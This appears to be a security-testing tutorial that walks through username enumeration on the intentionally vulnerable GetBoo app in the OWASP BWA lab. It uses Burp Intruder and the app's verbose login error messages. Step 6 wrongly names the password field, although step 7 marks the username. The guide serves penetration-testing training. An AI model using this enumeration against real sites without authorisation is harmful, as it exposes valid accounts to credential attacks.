Ensure Burp and the OWASP BWA VM are running and that Burp is configured in the Firefox browser used to view the OWASP BWA applications.

1. From the OWASP BWA Landing page, click the link to the GetBoo application:

2. Click the Log In button, and at the login screen, attempt to log in with an account username of admin and a password of aaaaa:

3. Note the message returned is The password is invalid. From this information, we know admin is a valid account. Let's use Burp Intruder to find more accounts.
4. In Burp's Proxy | HTTP history tab, find the failed login attempt message. View the Response | Raw tab to find the same overly verbose error message, The password is invalid:

5. Flip back to the Request | Raw tab and right-click to send this request to Intruder:

6. Go to Burp's Intruder tab and leave the Intruder | Target tab settings as it is. Continue to the Intruder | Positions tab. Notice how Burp places payload markers around each parameter value found. However, we only need a payload marker around the password value. Click the Clear § button to remove the payload markers placed by Burp:

7. Then, highlight the name value of admin with your cursor and click the Add § button:

8. Continue to the Intruder | Payloads tab. Many testers use word lists to enumerate commonly used usernames within the payload marker placeholder. For this recipe, we will type in some common usernames, to create a custom payload list.

9. In the Payload Options [Simple list] section, type the string user and click the Add button:

10. Add a few more strings such as john, tom, demo, and, finally, admin to the payload-listing box:

11. Go to the Intruder | Options tab and scroll down to the Grep – Match section. Click the checkbox Flag result items with responses matching these expressions. Click the Clear button to remove the items currently in the list:

12. Click Yes to confirm you wish to clear the list.
13. Type the string The password is invalid within the textbox and click the Add button. Your Grep – Match section should look as shown in the following screenshot:

14. Click the Start attack button located at the top of the Options page. A pop-up dialog box appears displaying the payloads defined, as well as the new column we added under the Grep – Match section. This pop-up window is the attack results table.
15. The attack results table shows each request with the given payload resulted in a status code of 200 and that two of the payloads, john and tom, did not produce the message The password is invalid within the responses. Instead, those two payloads returned a message of The user does not exist:

16. The result of this attack results table provide a username enumeration vulnerability based upon the overly verbose error message The password is invalid, which confirms the user account exists on the system:

This means we are able to confirm that accounts already exist in the system for the users user, demo, and admin.